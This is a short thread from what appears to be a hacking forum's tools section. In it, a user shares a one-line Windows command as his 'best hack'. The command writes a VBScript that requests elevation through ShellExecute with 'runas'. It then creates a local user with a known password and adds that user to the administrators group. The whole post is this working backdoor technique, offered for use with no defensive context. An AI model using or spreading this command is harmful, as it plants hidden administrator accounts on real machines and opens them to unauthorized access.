![]() |
My best one line hack so far... - Printable Version +- Sinisterly (https://sinister.ly) +-- Forum: Hacking (https://sinister.ly/Forum-Hacking) +--- Forum: Hacking Tools (https://sinister.ly/Forum-Hacking-Tools) +--- Thread: My best one line hack so far... (/Thread-My-best-one-line-hack-so-far) |
My best one line hack so far... - hacxx - 10-20-2022 Code: cmd.exe /c echo Set UAC = CreateObject("Shell.Application") >1b.vbs && echo UAC.ShellExecute "cmd.exe", "/c net user /add hacxx hacxx && net localgroup administrators hacxx /add", , "runas", 1 >>1b.vbs && 1b.vbs |